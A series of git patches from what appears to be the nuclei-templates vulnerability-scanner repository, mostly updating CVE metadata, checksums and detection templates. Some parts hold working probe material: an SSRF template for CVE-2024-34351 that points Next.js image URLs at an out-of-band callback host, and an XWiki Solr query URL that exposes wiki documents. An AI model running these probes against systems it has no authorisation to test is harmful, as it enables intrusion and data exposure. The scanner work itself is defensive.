wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2c6a6bc88baef89fc8a851b8d868a54f2d74c997 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 11:18:30 +0000 Subject: [PATCH 1256/1841] Auto Generated cves.json [Mon Jul 15 11:18:30 UTC 2024] :robot: --- cves.json | 4 ++++ cves.json-checksum.txt | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 48b0e65d86..6b513c36b5 100644 --- a/cves.json +++ b/cves.json @@ -2103,6 +2103,7 @@ {"ID":"CVE-2023-28662","Info":{"Name":"Wordpress Gift Cards \u003c= 4.3.1 - SQL Injection","Severity":"critical","Description":"The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version \u003c= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-28662.yaml"} {"ID":"CVE-2023-28665","Info":{"Name":"Woo Bulk Price Update \u003c2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The Woo Bulk Price Update WordPress plugin, in versions \u003c 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-28665.yaml"} {"ID":"CVE-2023-29084","Info":{"Name":"ManageEngine ADManager Plus - Command Injection","Severity":"high","Description":"Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-29084.yaml"} +{"ID":"CVE-2023-29204","Info":{"Name":"XWiki - Open Redirect","Severity":"medium","Description":"XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to bypass the existing security measures put in place to avoid open redirect by using a redirect such as `//mydomain.com` (i.e. omitting the `http:`). It was also possible to bypass it when using URL such as `http:/mydomain.com`. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29204.yaml"} {"ID":"CVE-2023-29298","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"An attacker is able to access every CFM and CFC endpoint within the ColdFusion Administrator path /CFIDE/, of which there are 437 CFM files and 96 CFC files in a ColdFusion 2021 Update 6 install.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29298.yaml"} {"ID":"CVE-2023-29300","Info":{"Name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","Severity":"critical","Description":"Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29300.yaml"} {"ID":"CVE-2023-29357","Info":{"Name":"Microsoft SharePoint - Authentication Bypass","Severity":"critical","Description":"Microsoft SharePoint Server Elevation of Privilege Vulnerability\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29357.yaml"} @@ -2280,6 +2281,7 @@ {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} +{"ID":"CVE-2023-4450","Info":{"Name":"JeecgBoot JimuReport - Template injection","Severity":"critical","Description":"A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4450.yaml"} {"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} {"ID":"CVE-2023-44812","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44812.yaml"} {"ID":"CVE-2023-44813","Info":{"Name":"mooSocial v.3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"Cross-Site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code via a crafted payload to the mode parameter of the invite friend login function.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44813.yaml"} @@ -2311,6 +2313,7 @@ {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} {"ID":"CVE-2023-48084","Info":{"Name":"Nagios XI \u003c 5.11.3 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-48084.yaml"} {"ID":"CVE-2023-48241","Info":{"Name":"XWiki \u003c 4.10.15 - Information Disclosure","Severity":"high","Description":"The Solr-based search suggestion provider that also duplicates as generic JavaScript API for search results in XWiki exposes the content of all documents of all wikis to anybody who has access to it, by default it is public. This exposes all information stored in the wiki (but not some protected information like password hashes). While there is a right check normally, the right check can be circumvented by explicitly requesting fields from Solr that don't include the data for the right check. This can be reproduced by opening \u003cxwiki-server\u003e/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain\u0026media=json\u0026nb=1000\u0026query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__\u0026input=+ where \u003cxwiki-server\u003e is the URL of the XWiki installation. If this displays any results, the wiki is vulnerable.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-48241.yaml"} +{"ID":"CVE-2023-48728","Info":{"Name":"WWBN AVideo 11.6 - Cross-Site Scripting","Severity":"medium","Description":"A reflected XSS vulnerability exists in the functiongetOpenGraph videoName functionality of WWBN AVideo 11.6 and dev master commit 3c6bb3ff, allowing arbitrary Javascript execution.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-48728.yaml"} {"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"} {"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} @@ -2382,6 +2385,7 @@ {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} {"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} {"ID":"CVE-2024-1380","Info":{"Name":"Relevanssi (A Better Search) \u003c= 4.22.0 - Query Log Export","Severity":"medium","Description":"The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1380.yaml"} +{"ID":"CVE-2024-1512","Info":{"Name":"MasterStudy LMS WordPress Plugin \u003c= 3.2.5 - SQL Injection","Severity":"critical","Description":"The MasterStudy LMS WordPress Plugin for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1512.yaml"} {"ID":"CVE-2024-1561","Info":{"Name":"Gradio 4.3-4.12 - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class between Gradio versions 4.3-4.12\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} {"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 9fc4b47fbc..bc5f3318a9 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -58f28adddb059a43b0d499b154186d90 +851cf7ffd87eb1993861c3b1212f2cc1 From eb3dfe9dadceafb1e3c3276ca29298dfa54785bc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 11:19:17 +0000 Subject: [PATCH 1257/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f4779767c5..3b1b1400d8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-29204.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/cves/2023/CVE-2023-44012.yaml' + - 'http/cves/2023/CVE-2023-4450.yaml' - 'http/cves/2023/CVE-2023-48728.yaml' - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' From d28415978c70dd0dca647db8d859fef7171824f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 11:20:14 +0000 Subject: [PATCH 1258/1841] Auto Template Signing [Mon Jul 15 11:20:14 UTC 2024] :robot: --- http/cves/2023/CVE-2023-4450.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index bd903ecbb7..9ab83dd243 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -49,3 +49,4 @@ http: - 'contains(content_type,"application/json")' - 'contains(body,"success")' condition: and +# digest: 4a0a004730450220135a9c5fa1c023dc55fe5eb17706449db2ea049b85cba660a61443ddea7479a3022100ddc514634d1076ee8fa7a54a93604c5c3ea9fe824c53cba4acc708c0e1550d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c137f3ceefb05c95a16e6f57a7d44f86503cd754 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 17:36:50 +0530 Subject: [PATCH 1259/1841] minor-update --- http/cves/2024/CVE-2024-34351.yaml | 25 +++++++++++++++++++++++-- 1 file changed, 23 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml index 23bbe1b96a..b0bc3df145 100644 --- a/http/cves/2024/CVE-2024-34351.yaml +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -1,18 +1,32 @@ id: CVE-2024-34351 info: - name: Next.js - SSRF + name: Next.js - Server Side Request Forgery (SSRF) author: righettod severity: high - remediation: Upgrade to Next.js version 14.1.1 or higher. description: | Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF. + remediation: Upgrade to Next.js version 14.1.1 or higher. reference: - https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps - https://nvd.nist.gov/vuln/detail/CVE-2024-34351 - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g + - https://github.com/vercel/next.js/commit/8f7a6ca7d21a97bc9f7a1bbe10427b5ad74b9085 + - https://github.com/vercel/next.js/pull/62561 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-34351 + cwe-id: CWE-918 + epss-score: 0.00062 + epss-percentile: 0.26843 metadata: max-request: 2 + product: next.js + shodan-query: + - http.html:"/_next/static" + - cpe:"cpe:2.3:a:zeit:next.js" + fofa-query: body="/_next/static" tags: cve,cve2024,vercel,nextjs,ssrf http: @@ -21,8 +35,15 @@ http: - '{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}' - '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}' + stop-at-first-match: true + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - 'http' + + - type: word + part: body + words: + - "The requested resource isn't a valid image" From c35e112e5a9348421b6a24b072501d7dd0516925 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 17:48:16 +0530 Subject: [PATCH 1260/1841] minor update --- http/exposures/configs/apache-ozone-conf.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/http/exposures/configs/apache-ozone-conf.yaml b/http/exposures/configs/apache-ozone-conf.yaml index 5c80a56ec3..1a0b836adf 100644 --- a/http/exposures/configs/apache-ozone-conf.yaml +++ b/http/exposures/configs/apache-ozone-conf.yaml @@ -23,9 +23,16 @@ http: matchers-condition: and matchers: - type: word + part: body words: - 'ozone-default.xml' - 'ozone' + condition: and + + - type: word + part: content_type + words: + - 'text/xml' - type: status status: From c40acc75f8791b455f0c76729b608508f37d3af5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 17:51:27 +0530 Subject: [PATCH 1261/1841] Update apache-ozone-detect.yaml --- http/technologies/apache/apache-ozone-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/apache/apache-ozone-detect.yaml b/http/technologies/apache/apache-ozone-detect.yaml index 2e7d2b908f..07b6657aea 100644 --- a/http/technologies/apache/apache-ozone-detect.yaml +++ b/http/technologies/apache/apache-ozone-detect.yaml @@ -5,7 +5,7 @@ info: author: icarot severity: info description: | - Detects a Apache Ozone web application, a scalable, redundant, and distributed object store for Hadoop and Cloud-native environments. + Detects a Apache Ozone web application, a scalable, redundant, and distributed object store for Hadoop and Cloud-native environments. classification: cpe: cpe:2.3:a:apache:ozone:-:*:*:*:*:*:*:* metadata: From 497b7996c7fd241192d89635f1df5e5fb0837f31 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 17:56:18 +0530 Subject: [PATCH 1262/1841] author name update --- http/cves/2022/CVE-2022-35914.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index bee81c0850..9fc868d35b 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -2,7 +2,7 @@ id: CVE-2022-35914 info: name: GLPI <=10.0.2 - Remote Command Execution - author: For3stCo1d + sender (github.com/allendemoura) + author: For3stCo1d,allendemoura severity: critical description: | GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module. From 83a19e1becd14b022fe8866e0592e544d03cfc78 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 12:36:50 +0000 Subject: [PATCH 1263/1841] Auto Generated New Template Addition List [Mon Jul 15 12:36:50 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 922d7f8f5c..ddcbc0606a 100644 --- a/.new-additions +++ b/.new-additions @@ -10,7 +10,9 @@ http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml +http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml http/misconfiguration/servicenow-title-injection.yaml +http/technologies/apache/apache-ozone-detect.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 9d8c25b6d7daf17c162ba3652b583da7504b3182 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 12:36:55 +0000 Subject: [PATCH 1264/1841] Auto Generated Templates Checksum [Mon Jul 15 12:36:55 UTC 2024] :robot: --- templates-checksum.txt | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index edb768bc9c..15353e62b2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:54289a82cf1c037dd6448d8f9eeb1bf730e677c6 -cves.json-checksum.txt:d5f06463ea1caf086fbccbaca48d49d83876faf8 +cves.json:4c2a84b412e8ffa5b7a00e4e63db995d52456256 +cves.json-checksum.txt:8d61f38e96d89a3923979efdff942cf8c7b56fc0 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3293,7 +3293,7 @@ http/cves/2023/CVE-2023-44012.yaml:bbecae0c3583a4572602e3fc0c8619bafeb77bad http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a http/cves/2023/CVE-2023-44352.yaml:aab520d12d287288efc9c45a67a0e196a444ff93 http/cves/2023/CVE-2023-44353.yaml:147dd7796888db15383a9db3b463b1c564bde8cf -http/cves/2023/CVE-2023-4450.yaml:44a7cf49f0f3248d174146ef6363d5d280737948 +http/cves/2023/CVE-2023-4450.yaml:c0f6a278a989a4e11d99a1543fad5c999232eec8 http/cves/2023/CVE-2023-4451.yaml:d5e665511b95b75eea8988c75f5427b4616e80c9 http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c http/cves/2023/CVE-2023-44813.yaml:ba83815830ad498e3a1e78649d1ddc4a48612025 @@ -4846,6 +4846,7 @@ http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4 http/exposures/configs/amazon-docker-config.yaml:1d8f327855f92a3e31436e4ba787bf72c1593362 http/exposures/configs/ansible-config-disclosure.yaml:49727934f2ea10682033bb7b7d2886c8120e599c http/exposures/configs/apache-config.yaml:f44a3a1e85855c7d7e0a98987e169b4d8c9953de +http/exposures/configs/apache-ozone-conf.yaml:93a18844e6db3976029026e9eba28b8735b8da0d http/exposures/configs/apache-pinot-config.yaml:5e48b64394394c62759e9a054ed422c5a891c50a http/exposures/configs/appspec-yml-disclosure.yaml:6bc7aaae85de1d64d2ad28ca4474205b6cba4a1a http/exposures/configs/appveyor-configuration-file.yaml:20b64eb403f080bf2a11eaf98f3010f97a7ddd39 @@ -6898,6 +6899,7 @@ http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa24 http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a http/technologies/apache/apache-guacamole.yaml:8c7975c569769ee074f51307e0d963b816e631aa http/technologies/apache/apache-karaf-panel.yaml:50fa0b20105a0786c5ce5ddce7aa5c49237bfafa +http/technologies/apache/apache-ozone-detect.yaml:2bae35e190d1e6e7c6ae74b4b4e3f247bb08e562 http/technologies/apache/apache-pinot-detect.yaml:d87ea1adf8a744e4bea49ca48778d43572019d8d http/technologies/apache/apache-tapestry-detect.yaml:e909341eeb3f54c209d395e2d5277b754985d70c http/technologies/apache/apache-zeppelin-detect.yaml:2be8f1552e97541d05b1a9ed6d9fda8b2d9df37d @@ -8879,7 +8881,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6541ef1d68f6051c35d1edb80eeeed45cc1bfdc0 +templates-checksum.txt:da9b1a3c014a2e59abc022fc2f8c7e189fb4ef51 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c7baa6b2c5a1f400c68ff50754d0f36c5e6e81a9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 12:37:50 +0000 Subject: [PATCH 1265/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3b1b1400d8..cf759d5638 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,8 +15,10 @@ on: - 'http/cves/2024/CVE-2024-4879.yaml' - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' + - 'http/exposures/configs/apache-ozone-conf.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' + - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' workflow_dispatch: From bf44a3730526128a57a841caaaabedec5d0edbfe Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 12:37:58 +0000 Subject: [PATCH 1266/1841] Auto Generated New Template Addition List [Mon Jul 15 12:37:57 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ddcbc0606a..1de228ee1a 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml +http/exposed-panels/falcosidekick-panel.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/apache-ozone-conf.yaml http/exposures/configs/snoop-servlet-exposure.yaml From 10f817c460e7cb9d7727976b934f70ce7a196ee6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 12:38:09 +0000 Subject: [PATCH 1267/1841] Auto Generated Templates Checksum [Mon Jul 15 12:38:09 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 15353e62b2..84e5f55ef3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4023,6 +4023,7 @@ http/exposed-panels/extron-cms-panel.yaml:adbdc23be4107dc614acb0ef6ea20aba3796be http/exposed-panels/ez-publish-panel.yaml:5dc8fa80dca1479e568d4b1cf87563755471e0a0 http/exposed-panels/f-secure-policy-manager.yaml:e759ce79b7869284f9cddab81bfa0da26d08099b http/exposed-panels/f5-admin-interface.yaml:06ce0e9fbf3ed64d2e550abccd8fa1ba7cea60a4 +http/exposed-panels/falcosidekick-panel.yaml:0bd17de7df4e475e056b9df0d7a209cffe9ca240 http/exposed-panels/faraday-login.yaml:c3b48df43eb116d0c1e264a181ca095685ef0e0b http/exposed-panels/fastapi-docs.yaml:74f9efd92e158f5b36c17eb1e45668c5fb0dafee http/exposed-panels/fastpanel-hosting-control-panel.yaml:302d3b1d9cb607ffebc9746556ba3af14fb57e0e @@ -8881,7 +8882,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:da9b1a3c014a2e59abc022fc2f8c7e189fb4ef51 +templates-checksum.txt:fc90fb832b47142377c43a1e88ce4aeb61f64497 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 82f1fb6bc1ec129c60e08ebe33d0c26e672fbf7b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 12:38:37 +0000 Subject: [PATCH 1268/1841] Auto Template Signing [Mon Jul 15 12:38:37 UTC 2024] :robot: --- 